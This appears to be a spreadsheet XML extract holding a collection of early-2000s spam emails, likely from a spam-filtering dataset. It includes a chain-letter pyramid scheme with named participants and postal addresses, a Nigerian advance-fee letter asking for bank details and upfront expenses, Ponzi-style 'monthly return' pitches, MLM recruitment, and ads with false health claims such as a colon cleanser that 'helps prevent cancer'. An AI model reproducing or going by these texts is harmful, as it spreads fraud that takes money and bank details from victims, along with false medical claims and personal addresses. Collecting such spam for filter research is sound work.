removal required. Thank you for your kind consideration. @@@@@@@@@@@@@@ DISCLAIMER @@@@@@@@@@@@@</t>
  </si>
  <si>
    <t xml:space="preserve">*** PLEASE READ THIS EMAIL TO THE END ***
Â 
Try it. Just for fun. It will cost you 25$ to earn at least thousands of dollars !!! This thing 
is legal because you are buying and selling something of value: marketing reports.
Â 
There is MY true story.
Â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50$ to 150$ in CASH everyday! That's why I went 
into this thing!
Â 
Â 
THANK'S TO THE COMPUTER AGE AND THE INTERNET!
=========================================
BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
Â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Â 
Their findings proved once and for all that there are ''absolutely NO Laws prohibiting the 
participation in the program and if people can "follow the simple instruction" they are 
bound to make some mega bucks with only $25 out of pocket cost''.
Â 
== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ==
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Â 
If you would like to make at least $500,000 every 4 to 5 months easily and comfortably, 
please read the following... THEN READ IT AGAIN and AGAIN!!!
Â 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Â 
FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
Â 
INSTRUCTIONS:
Â 
=====Order all 5 reports shown on the list below =====
Â 
For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT YOU ARE 
ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON 
THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR 
ENVELOPE TOP LEFT CORNER in case of any mail problems.
Â 
===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
===YOU ORDER EACH OF THE 5 REPORTS! ===
Â 
You will need all 5 reports so that you can save them on your computer and resell them. 
Â 
YOUR TOTAL COST $5 X 5 = $25.00.
Â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Â 
IMPORTANT - DO NOT alter the names of the people who are listed next to each report, 
or their sequence on the list, in any way other than what is instructed below in step '' 1 
through 6 '' or you will loose out on the majority of your profits. Once you understand the 
way this works, you will also see how it does not work if you change it. 
Â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Â 
This IS a legitimate BUSINESS. You are offering a product for sale and getting paid for it. 
Treat it as such and you will be VERY profitable in a short period of time.
Â 
1.. After you have ordered all 5 reports, take this advertisement and REMOVE the name 
&amp; address of the person in REPORT # 5. This person has made it through the cycle and 
is no doubt counting their fortune.
Â 
2..Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
Â 
3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
Â 
4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
Â 
5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
Â 
6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
Â 
PLEASE MAKE SURE you copy every name &amp; address ACCURATELY! This is critical 
to YOUR success.
Â 
Take this entire letter, with the modified list of names, and save it on your computer. DO 
NOT MAKE ANY OTHER CHANGES.
Â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Â 
METHOD # 1: BY SENDING BULK E-MAIL LEGALLY
=========================================
Â 
Let's say that you decide to start small, just to see how it goes, and we will assume You 
and those involved send out only 5,000 e-mails each. Let's also assume that the mailing 
receive only a 0.2% (2/10 of 1%) response (the response could be much better but lets 
just say it is only 0.2%). Also many peoplewill send out hundreds of thousands e-mails 
instead of only 5,000 each).
Â 
Continuing with this example, you send out only 5,000 e-mails. With a 0.2% response, 
that is only 10 orders for report # 1. Those 10 people responded by sending out 5,000 e-
mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded with 
orders. That's=100 people responded and ordered Report # 2.
Â 
Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails. The 0.2% 
response to that is 1000 orders for Report # 3.
Â 
Those 1000 people send 5,000 e-mail each for a total of 5 million e-mail sent out. The 
0.2% response is 10,000 orders for Report # 4.
Â 
Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000(50 million) e-
mails. The 0.2% response to that is 100,000 orders for Report # 5. 
Â 
Â 
THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (half a million dollars).
Â 
Your total income in this example is: 1..... $50 + 2..... $500 + 3.....$5,000 + 4..... 
$50,000 + 5.... $500,000 .... 
Grand Total = $555,550.00
Â 
NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT THE WORST 
POSSIBLE RESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU WILL 
STILL MAKE A LOT OF MONEY !
=========================================
Â 
REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF 
5,000 YOU MAILED TO. Dare to think for a moment what would happen if everyone or 
half or even one 4th of those people mailed 100,000 e-mails each or more?
Â 
There are over 150 million people on the Internet worldwide and counting, with thousands 
more coming on line every day. Believe me, many people will do just that, and more!
Â 
METHOD # 2: BY PLACING FREE ADS ON THE INTERNET
=========================================
Â 
Advertising on the net is very, very inexpensive and there are hundreds of FREE places 
to advertise. Placing a lot of free ads on the Internet will easily get a larger response. We 
strongly suggest you start with Method # 1 and add METHOD #2 as you go along. For 
every $5 you receive, all you must do is e-mail them the Report they ordered. That's it. 
Always provide same day service on all orders.
Â 
This will guarantee that the e-mail they send out, with your name and address on it, will 
be prompt because they can not advertise until they receive the report.
Â 
===========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Â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Â 
PLACE YOUR ORDER FOR THESE REPORTS NOW :
=========================================REPORT # 1: 'The Insider's 
Guide To Advertising for Free On The Net
Â 
Order Report #1 from: 
Y.L.Wong
P.O. Box NO. 71819
Kowloon Central Post Office
Hong Kong
__________________________________________________
Â 
REPORT # 2: The Insider's Guide To Sending Bulk Email On The Net
Â 
Order Report # 2 from: 
Martin Veronneau
C.P. 70058
Laval, Quebec
H7R 5Z2
Canada__________________________________________________
Â 
REPORT # 3: Secret To Multilevel Marketing On The Net
Â 
Order Report # 3 from: 
Francis Kidd
P.O. Box 209
Homestead, PA 15120
USA
Â 
__________________________________________________
Â 
REPORT # 4: How To Become A Millionaire Using MLM &amp; The Net
Â 
Order Report # 4 from: 
M.L. Frayser
P.O. Box 61432
Fort Myers, FL 33906
USA__________________________________________________
Â 
REPORT # 5: How To Send Out One Million Emails For Free
Â 
Order Report # 5 From: 
Stone Evans 
600 N. Pearl, Suite G103
Dallas, TX 75201
USA 
Â Â 
__________________________________________________
$$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
Â 
Follow these guidelines to guarantee your success:
Â 
=== If you do not receive at least 10 orders for Report #1 within 2 weeks, continue 
sending e-mails until you do.
Â 
=== After you have received 10 orders, 2 to 3 weeks after that you should receive 100 
orders or more for REPORT # 2. If you did not, continue advertising or sending e-mails 
until you do.
Â 
**Once you have received 100 or more orders for Report # 2, YOU CAN RELAX, because 
the system is already working for you, and the cash will continue to roll in ! THIS IS 
IMPORTANT TO REMEMBER: Every time your name is moved down on the list, you are 
placed in front of a Different report.
Â 
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Â 
Remember to e-mail a copy of this exciting report after you have put your name and 
address in Report #1 and moved others to #2 .....# 5 as instructed above. One of the 
people you send this to may send out 100,000 or more e-mails and your name will be on 
every one of them. 
Â 
Remember though, the more you send out the more potential customers you will reach. 
So my friend, I have given you the ideas, information, materials and opportunity to 
become financially independent.
Â 
IT IS UP TO YOU NOW!
Â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Â 
Well, the laugh was on me! Within 3 weeks she had received 50 responses. Within the 
next 45 days she had received total $ 147,200.00......... all cash! I was shocked. I have 
joined Jodyin her ''hobby''.
Â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Â 
The nice thing about this deal is that it does not matter where people live. There simply 
isn't a better investment with a faster return and so big''. 
Â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Â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third 
month my total cash count was $362,840.00. Life is beautiful, Thanx to internet''. 
Â 
Fred Dellaca, Westport, New Zealand
=========================================
Â 
ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO 
FINANCIAL FREEDOM !
Â 
=========================================
If you have any questions of the legality of this program, contact the Office of Associate 
Director for Marketing Practices, Federal Trade Commission, Bureau of Consumer 
Protection, Washington, D.C.
Â 
Â 
This message is sent in compliance of the proposed bill SECTION 301, paragraph 
(a)(2)(C) of S. 1618. 
Â 
Â 
* This message is not intended for residents in the State of Washington, Virginia or 
California, screening of addresses has been done to the best of our technical ability.
Â 
* This is a one-time mailing and this list will never be used again.
Â 
Â 
* To be removed from this list, please send an email with the word REMOVE in the 
subject line to freebie4u@sinatown.com
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</si>
  <si>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SAVE 
                      50%-75% OFF the prices you're currently paying for 
                      replacement inkjet cartridges by shopping at inkjetvilla.com. 
We 
                      offer cartridges for Epson, Lexmark, HP, and Canon
                      at the...LOWEST PRICES 
                      you'll find anywhere! Click here and Save!  
 * 50-75% OFF all inkjet cartridges, toner ink,  
                              and        paper!
 * We GUARANTEE you will be 100% Satisfied or   
YOUR Money Back!
 * ACT NOW! Offer for a Limited Time Only. 
Free 
                      Shipping on Orders over $75.00.
Start 
                      Saving with inkjetvilla.com Now!
click here
Testimonials: "The quality of the inkjet cartridge 
                      from Inkjetvilla.com is excellent. I wish ALL my internet 
                      purchases went this well. I received speedy service with 
                      my order.   Thank you Inkjetvilla!" Erik, 
                      West Palm Beach, FL We respect your privacy. You have opted in to receive updates on the best discount offers while visiting one of our partner sites or an
affiliate.
If you would no longer like to receive these offers via email, you can unsubscribe by sending a blank email to unsub-60763006-1047@top-special-offers.com
OR
Sending a postal mail to CustomerService, Box 202885, Austin, TX 78720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</si>
  <si>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Below is the result of your feedback form.  It was submitted by
 (oceandrive@email.is) on Sunday, July 21, 2002 at 12:29:29
---------------------------------------------------------------------------: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://005@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx007 Click to remove http://005@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 -----------------------------------------------------------------------------DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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New Page 1
This page uses frames, but your browser doesn't support them.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Home Based Business  &lt;!--
a:hover { color:#cc0000; font-type:bold }
H1      { color:#006699 }
  --&gt;Â 
Â Join For
      Free! 
      Guaranteed Downline!Great
      Income!You have found the #1 home business
         and your timing could not be better!Â  
      Are you
      tired of punching a timeclock for someone else?Â  Had enough of your
      job?Â Â 
      Do you truly want the freedom that comes from having a successful
      residual income business? 
Then this
      Home Business  is what you're looking
      for     !Thousands of people just like you have started their own home-based
      business and said goodbye to their jobs.Â  Would you like to be
      affiliated with 
CDUniverse.com,
      Microsoft, Sears,ConsumerWarehouse.com,
      KBKids.com, OfficeMax.com,
      Walmart.com and Dell.com       , ToysRus.com, just to name a few?
      There areÂ more than 220 Stores.Â 
Own
      a piece of all these Multi-Billion Dollar Stores . You
      always get Rebates when shop from your own stores
          online.      Â 
With
      yourÂ    home business, you can be your own boss,
      set your own hours and determine the amount of income you want to
      earn.Â  Thousands of members worldwide are 
          earning substantial incomes  with
      this proven home business, so the potential to be financially
      independent is here waiting for you.Â  What's more, everyone
      who joins is on the same success team. We all build our business
      together!      Â 
There is a freedom you'll enjoy in owning your own home
      business.Â "Quality" family time can include "quantity
          " as well.Â  Lack
      of money can be a thing of the past as you enjoy life to its
      fullest!In order for you to see how our network
      referral development plan works, we have created a FREE introductory
      program called Postlaunch. As
      aÂ Free Member       , you are
      given a position in our network at no cost to you and without
      any obligation.
      We want you to see just how good this Home Business really is without risking a
      penny!
      Have
            Your Downline Built BEFORE You Spend Any Money! 
            This program even offers you a proven way to build a business
            and
a  
GUARANTEED
            DOWNLINE!! 
            Don't miss out on this Great Opportunity to secure yourself An Outstanding Monthly
            Residual IncomeIt's
            FREE to join our Post Launch Program
            Your FREE membership # will also be entered into a lucky drawing
to WIN
            $100 to shop online!ALL
            new members who join after you will be placed in 
            ONE Straight Line down UNDER you.            YOU can easily get 1000 - 3000 paid VIP members under your position
            in a month! 
There is absolutely NO RISK
              to get involved and 
NO COST to join our Post Launch
        Program. To sign up FREE:
Type your FIRST
            &amp; LAST name
               here:  
Type your email
            address
             here:  
THEN CLICK
            HERE  Â 
By getting a free
            membership, you agree to receive emails about theÂ consumer and
            business opportunities.You
            have nothing to lose and potentially a lot to gain.Join Now!
We will confirm your position
            and send you 
            a special report right away.There is no
            cost and no obligation.Â "People are allways blaming their
circumstances for what they are. The people who get on this world
arethey who get up and look for the circustances they want,and, if they
can't find them, make them"By Goerge Bernard
Shaw
"There are risks and costs to a program of action.
Butthey are far less than the long-range risks and costs ofcomfortable
inaction" 
By John F.
Kennedy
Per
the proposed H.R. 3113 Unsolicited Commercial Electronic Mail Act of 2000,
further transmissions to you by the sender may be stopped at NO COST to you
by Clicking Here to REMOVE.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</si>
  <si>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Real 
	 Drugs - Viagra and Phentrimine
Order all you 
		favorite drugs on line. 
Click 
		Here For Viagra, Phentrimine and more!  
Remove yourself from this list by either:
  Entering your email address below and clicking REMOVE:
OR
  Reply to this message with the word "remove" in the subject line.
  This message was sent to address cypherpunks@einstein.ssz.com
pmguid:1dx.2pdp.fsi52--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Government Grants E-Book 2002 editionYou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credit.Please Visit Our Website
And Place Your  Order TODAY! CLICK HERE Â We apologize for any email you may have inadvertently received.
Please CLICK HERE to be removed from future mailings. [JK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Â 
CLEANSE YOUR BODY NATURALLY !
        FEEL HEALTHY TODAY 
        !
YOU HAVE THE POWER TO HELP PREVENT
CANCER 
        !
YOU HAVE THE POWER TO RID YOUR BODY 
        OF UNWANTED 
TOXINS 
        !This product was 
        designed to aid in the bodies digestive system. It is made up of 11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100% LIFETIME GUARANTEEClick HERE 
        to see the ingredients and how they work
This Stuff REALLY WORKS !
            And We GUARANTEE IT For Life 
!!!
STOP MAKING
EXCUSES 
CHANGE YOUR LIFE 
 TODAY!!!CLICK 
HERE 
TO READ ABOUT EXTREME COLON CLEANSER Regularly $19.99
Â Â Â Â  Order
TODAY 
for ONLY $14.99 per bottle
CopyrightÂ© 2000, 2001, 2002 Marketing Co-Op AllRights Reserved.We hope you enjoy 
receiving Marketing Co-op's special offer emails. You have received this 
special offer because you have provided permission to receive third party email 
communications regarding special online promotions or offers. However, if you 
wish to unsubscribe from this email list, please click here. 
Please allow 2-3 weeks for us to remove your email address. You may receive 
further emails from
us during that time, for which we apologize. Thank you.
Â 
Â </t>
  </si>
  <si>
    <t>20th July, 2002To:    The PresidentFrom:  AB SanniAssalam Aleikum,I wish to seek your assistance in a matter that needs trust secrecy and
confidentiality.I am A. B. Sanni, a close confidant to Mohammed Abacha, son of late
General Sani Abacha, former head of state Federal Republic of Nigeria, who
ruled from November 17th 1993 to June 8th 1998 when he died suddenly in
office.Since then, the family as a whole has been facing all sorts of
harassments, by security operatives/agents of the new Head of State
(General Obasanjo) who served a jail term under my friend's father for
coup offence. Even my friend's old mother has been detained and tortured
many times.  Mohammed is now being charged for military decision of his
father's regime e.g. the murder cases of political opponents. These
offences he knows nothing about, as he was only the Head of State's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1999. However, they have hidden records in a secret
name with the Nigerian Insurance Deposit Corporation to access a coded
trust accounts in Europe valued at Three Hundred and Thirty Eight Million
United States Dollars only ($338,000,000).   Mohammed is currently being
detained and tortured to sign off accounts of his late father and he has
done that but not the coded trust accounts in the name of certain
government multinational contractors that I can not disclose now.THE AIM OF THIS LETTER IS TO REQUEST YOUR ASSISTANCE TO SECURE THIS
ACCOUNT IN A SAFE/CONFIDENTIAL BANK AND HELP INVEST THE MONEY FOR OUR
MUTUAL BENEFIT. We also expect to use some of our share of the money to
relocate ourselves to another safe Country because right now Nigeria is
not safe and we will like to go into hiding overseas if we can escape.If you are interested in helping secure the accounts please contact me
immediately by email "a_sanni@email.com",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($338,000,000).We will depend on your business experience to make sure that we get
maximum returns on our investment with you.PLEASE NOTE THAT IN THE PROCESS OF SECURING THE CODED TRUST ACCOUNT YOU
ARE LIKELY TO INCURE EXPENSES BUT IT WILL BE PAID BACK ONCE WE SECURE THE
DEPOSIT.  IT IS 100% SAFE FOR YOU AND YOU HAVE NOTHING TO WORRY ABOUT. 
Just forward via email your full name, phone number, fax number and bank
details as the new beneficiary to enable us make formal application for
the transfer of ownership to you.We look forward to your helping us, but if you are not interested kindly
discard this letter and still maintain its confidentiality.Ma-Salam.For Mohammed Abacha</t>
  </si>
  <si>
    <t xml:space="preserve">
F I N A L    N O T I C E !
NEW PROGRAM pays you IMMEDIATELY!Get STARTED TODAY 
with USA's fastest growing BUSINESS OPPORTUNITYNOT MLM!Here you get paid LARGE checks the same day!
Use the Internet to make money 24 hours a day!I made unbelievable $21,000 in June! 
.. and will prove it, if you wish!
Everybody can do this!
- A U T O P I L O T   SYSTEM ! - 
OUR System generates all LEADS for YOU!MINIMUM cash outlay gets you STARTED TODAY!
Program available in US and Canada ONLY!
Are you ready to CHANGE YOUR LIFE ?
To receive FREE INFO about this LAST OFFER,
please send an email to:     RickBellrist@excite.comwith "SEND INFO" in the subject line!!
(do NOT click REPLY!)To remove, please send an email with "REMOVE" 
in the subject line to:      RickBellrist@excite.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Y O U R  last chance for Y O U R $3000.00 INCOME per WEEK!
Give Me 5 Minutes, And I'll Show You
How To Flood Your Bank Account With Serious Cash,
DID YOU MAKE $12,000 LAST MONTH
IF NOT, YOU NEED TO JOIN US TODAY!-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it!NO hype ! All legal !
USA and Canada ONLY !
Request more free info NOW! 
send an email to:      Plutoristal@excite.comwith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</si>
  <si>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FitnessHeaven.comYou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
</t>
  </si>
  <si>
    <t>Established Global Network Marketing Opportunity!Our automated sales and marketing system signed up
over 450 people into my downline for me my first
day!Binary Plan pays INFINITE LEVELS DEEP PLUS 
up to $75.00 for each personal sale! Share in 3 
different bonus poolsBuy ONE position and receive 2 more positions FREE!
A Tri-Pack for the cost of a single entry! Tripple your
check!For more information and to test drive our automatic
sales and marketing system click the following link:
mailto:call4cash@excite.com?subject=more_som_info_please 
This system signed up over 450 people into my downline
the first day. Only 2 of them went under me and the
rest went under other people.  How many of the next
450 do you want under you?  Reserve your position now 
for free!Please reply now. This company is established and 
growing rapidly.  Reserve your place now!For more information and a FREE test drive of our automatic
sales and marketing system click the following link:
mailto:call4cash@excite.com?subject=more_som_info_please Thank you,Dan
Financially Independent Home Business Owner
1-800-242-0363, Mailbox 1993P.S. We have over 1 million opportunity seekers
which we will be contacting.  I suggest you reserve
your free position now.
mailto:call4cash@excite.com?subject=more_som_info_please 
______________________________________________________
To be removed from our database, please click below:
mailto:nogold4me666@excite.com?subject=remove</t>
  </si>
  <si>
    <t>Easy 30-50% Return?Learn how you can receive a monthly check for 3, 4, or 5%
a month until your initial investment is paid off...then a
monthly check for over 4% a month for years to come...We know it sounds impossible, but it's happening today.For complete information on this 
multi-trillion dollar industry:http://market.pakoa.com/cl6
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
To Opt Out:Please go to our ""opt-out"" WEBSITE:http://www243.wiildaccess.com/optout.html [JK9^":}H&amp;*TG0BK5NKIYs5]</t>
  </si>
  <si>
    <t xml:space="preserve">
Foreclosure World's Premium Moving Source
webmaster,
Save up to 50% of your MOVING costs! 
Get FREE MULTIPLE MOVING COST ESTIMATES From Professional Prescreened 
Movers.
Start your move on the right foot - It's easy to get your FREE quotes:
1. Click on the highlighted link below2. Fill out the form and 
submit your request3. Get quotes from movers, compare rates and hire the best mover
Get FREE Quotes Now:
http://www.foreclosureworld.net/cgi-bin/click.cgi?c=21
AOL Users: Click Here
Moving Locally? Long Distance? Self Service? Small move? Car shipping?http://www.foreclosureworld.net/cgi-bin/click.cgi?c=22
AOL Users: Click Here
Check out our movers network and request quoteshttp://www.foreclosureworld.net/cgi-bin/click.cgi?c=23
AOL Users: Click Here
Regards webmaster, 
Your Friends At Foreclosed Homes 
To unsubscribe or change subscriber options click:
click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</si>
  <si>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We'll 
	  give you your first tube of Body Sculpture FREE!! 
Let us bill your credit card for $5.99 for shipping 
	  and handling and we'll send you your first bottle of Body Sculpture free. 
	  Four weeks after you place your order, your credit card will automatically 
	  be billed for $22.95 plus $5.99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 a blank email to unsub-60763006-1054@top-special-offers.com
OR
Sending a postal mail to CustomerService, Box 202885, Austin, TX 78720
This message was sent to address cypherpunks@einstein.ssz.com--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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100% Free Porn!
What more can you ask for?
CLICK HERE
Â 
Â 
Â 
REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.
However, if you'd rather not receive future e-mails from us,
CLICK HERE to send email and add the word REMOVE in the subject line.
Please allow 48 hours for processing. [J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">é»„å±±æ—…æ¸¸å¤©å¤©å‘  http://www.njchina.com/skttf.htm
å—äº¬ç‰¹ä»·å®¾é¦†ä»»ä½ é€‰  http://www.njchina.com/bgmc.htm
è´ºå¡ã€è¯­éŸ³èŠå¤©ã€äº¤å‹ã€å¾å©š  http://www.njchina.com/qwltgc.htm
è¶£å‘³æ–°é—»ï¼Œå›¾æ–‡å¹¶è²Œï¼Œå°½åœ¨ http://www.njchina.com
</t>
  </si>
  <si>
    <t xml:space="preserve">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column.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Easy 30-50% Return?Learn how you can receive a monthly check for 3, 4, or 5%
a month until your initial investment is paid off...then a
monthly check for over 4% a month for years to come...We know it sounds impossible, but it's happening today.For complete information on this 
multi-trillion dollar industry:http://www.page4life.org/users/69chevelle/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
To Opt Out:Please go to our "OPT OUT" website:http://www.page4life.org/users/69chevelle/optout.html
</t>
  </si>
  <si>
    <t xml:space="preserve">index.gif 
 Remove yourself from this recurring list by:Clicking here to send a blank email to unsub-7552100-332@mm53.comORSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063This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</si>
  <si>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Foreclosure Toolkit
	&lt;!--	td {  font-family: Arial, Helvetica, sans-serif}	--&gt;
Great News webmaster,
FINALLY  -  A Foreclosure Tycoon Reveals His Most Closely Guarded Secrets! For the first time ever, we are proud to bring you Foreclosure's most closely guarded secrets - a complete, turn-key system to either owning your own home or making a fortune in Foreclosure Real Estate without tenants, headaches and bankers. FREE information for a revolutionary brand-new approach to show you exactly how to buy a foreclosure or make a fortune in foreclosure real estate in today's market.Are you ready to take advantage of this amazing information?
webmaster,  take this first step to improving your life in the next 2 minutes!
For FREE Information  Click Here:
http://www.foreclosureworld.net/cgi-bin/click.cgi?c=12
To unsubscribe or change subscriber options click:
click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</si>
  <si>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Note: Your e-mail address was added to a database by you.
I am sending my advertisement to this database and, if 
you are not interested in receiving ads similar to mine, 
It would be in your best interest to click the below link 
and opt-out of our mailings by simply adding your address 
to our globalBlock List. Your e-mail address will NOT be 
sold, validated or used in other mailings,as it belongs 
to you and only you , we respect that!
---------------------...............&gt; For your Free Membership, Click this link: 
mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
Be sure to include your first and last name in the body of the leterOr to be removed from my mailing list, Click this link:
mailto:teamsuccessrequest@yahoo.com?subject=remove  Is this what you're looking for...1.  DO: Want to work from home?
2.  DO: Want to build yourself an income you can be proud of?
3.  DO: Want to be able to tell your friends and family about 
what you're doing... instead of keeping it a secret so they 
don't laugh (I've been there, I know)?
4.  DO: Want to be able to produce a copy of your check to 
any one interested b in this business?
5.  DO: Want to have A Monthly Income which can be passed 
on when your time is up?
6.  DO: Want to be in a team business which gives you the 
chance to help other people AND get paid for it?
7.  NOT: Want to be scammed?
8.  NOT: Want to spend all your time recruiting?
9.  NOT: Want to talk to people on the phone?
10. NOT: Wanting to be involved with a"get rich quick"program? Please, do yourself a favor and check this out.  
It's absolutely FREE 
to get more information and you may cancel at ANY time!
.......&gt; For your Free Membership, Click this link: 
mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
Be sure to include your first and last name in the body of the leterOr to be removed from my mailing list, Click this link:
mailto:teamsuccessrequest@yahoo.com?subject=remove  IT DOES NOT MATTER WHERE YOU LIVE!  This is an International 
business with people all over the world (over 160 different 
countries involved)!   Join our TEAM and you will succeed!  
We have the people, the knowledge and the ability to guide you... 
step by step... to a profitable business.I AM NOT going to hype you up with Stuff trying to get you involved.
In fact, if you think you're going to make money overnight with this,
please do NOT click on the link. Simply remove yourself from this 
list (instructions below).The difference between this online business and an offline business 
is that the tools you need for proven success... are given to you 
for FREE after you decide to create your own successful business!  
To verify what I'm saying, ask any local business person if they 
were given the tools they needed to make their business the success 
it is, for free when they started out.They'll laugh at the question!You DO NOT need...
1.  A small fortune to get started.
2.  A lot of "business knowledge" or "business contacts" to get started.
3.  To commute anywhere, talk to anyone or buy any items to get started.Everyday hundreds of people join for free and get the free information 
theyneed to succeed.  When they see that they too can make money with 
this business, they get involved.  There are already over 2 million 
people who have joined for free to check things out.  This business has 
been thriving for over five years!Do you have...A.  An internet connection.
B.  One or two hours a day to build your business.
C.  The ability to ask and receive all the help you need to succeed.
D.  The drive to succeed.
E.  The need for extra income each and every month.Then YOU TOO can make MORE money for you and your family and you too 
can run your own profitable business!
This is probably the only business in the world where you personally 
reap all the rewards from your personal efforts and not those above 
you getting it instead of you (i.e. your boss).I want to help YOU to make money on the 'net as part of our successful
T.E.A.M.  You owe it to yourself to at least look.  Click on the link
below................&gt; For your Free Membership, Click this link: 
mailto:teamsuccessrequest@yahoo.com?subject=I_Want_A_Free_Membership
Be sure to include your first and last name in the body of the leterOr to be removed from my mailing list, Click this link:
mailto:teamsuccessrequest@yahoo.com?subject=remove 
=============================================
Thank you very much for your precious time!
Sincerely,  D.Woodwardmailto:teamsucc
essrequest@yahoo.com?subject=I_Want_A_Free_Membership
Be sure to include your first and last name in the body of the leterTo be removed from this mailing list, please click this link:
mailto:teamsuccessrequest@yahoo.com  and reply with "remove" in the 
subject line.aromttixnthdxslmcxklhukpevnjqgwebbsyq
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
############################################
#                                          #
#       Adult Online Super Store           #
#              Shhhhhh...                  #
#     You just found the Internet's        #
#          BEST KEPT SECRET!!!             #
#    3 Vivid DVDs Absolutely FREE!!!       #
#                                          #
############################################
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;If you haven't seen it yet... we are offering a
new weekly selection absolutely FREE Adult DVDs
AND VIDEOS NO PURCHASE NECESSARY!!!!! GO TO: http://209.203.162.20/8230/Everything must go!!! Additional Titles as
low as $6.97&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;############################################
#                                          #
#  Don't forget to forward this email to   #
#  all your friends for the same deal...   #
#  There is a new free DVD and VHS video   #
#  available every week for your viewing   #
#  pleasure.                               #
#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removal.This e-mail is sent in compliance with the Information Exchange Promotion 
and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
'removal' instruction.faarakxavoxcadetxjpir
</t>
  </si>
  <si>
    <t xml:space="preserve">*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************I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</si>
  <si>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A man endowed with a 7-8" hammer is simply
 better equipped than a man with a 5-6"hammer. 
Would you rather havemore than enough to get the job done or fall short. It's totally upto you. Our Methods are guaranteed to increase your size by 1-3" Come in here and see how--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Giveaway Destinations!
VACATION
 Register For One Of Our Giveaway 
            Destinations  F 
R
E
E
Over 30 Destinations To Choose 
              From!Click 
            Here To RegisterFlorida
Eastern United States
Western United States
Caribbean
Mexico
HawaiiClick 
            Here To Register
Â 
This Is a Free Notification Service. 
            If You Do Not Wish To Be Informed About Our "No Obligation" 
            Services
            And Products Or If You Received This In Error Please Click 
            Here To Be Removed..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</si>
  <si>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Your application for the Grant is below.  Remember, because of the type of Grant this is, you will never need to repay!&gt;&gt;Time is limited. &lt;&lt;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higher!APPLY NOW! 
Deadline is almost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</si>
  <si>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Remove yourself from this list by either:
  Entering your email address below and clicking REMOVE:
OR
  Reply to this message with the word "remove" in the subject line.
  This message was sent to address cypherpunks@einstein.ssz.com
pmguid:1dx.2k50.fsi52--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Below is the result of your feedback form.  It was submitted by
 (kazadown@libero.it) on Monday, July 22, 2002 at 04:49:18
---------------------------------------------------------------------------: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://008@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx007 Click to remove http://009@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 ---------------------------------------------------------------------------http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!
know who is telling you the truth! We can solve all your problems.Visit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[BK5NKIYs5]
</t>
  </si>
  <si>
    <t>Dear dhudobenko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[5NKIYs5]</t>
  </si>
  <si>
    <t>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heredonmir</t>
  </si>
  <si>
    <t xml:space="preserve">INSIGHT NEWS ALERT!A new issue of Insight on the News is now onlinehttp://insightmag.com/news/258763.html...............................................Folks, the summerï¿½s upon us here in the nationï¿½s capital. And, matching the 
weather, your representatives are heatedly working to improve the Wall Street 
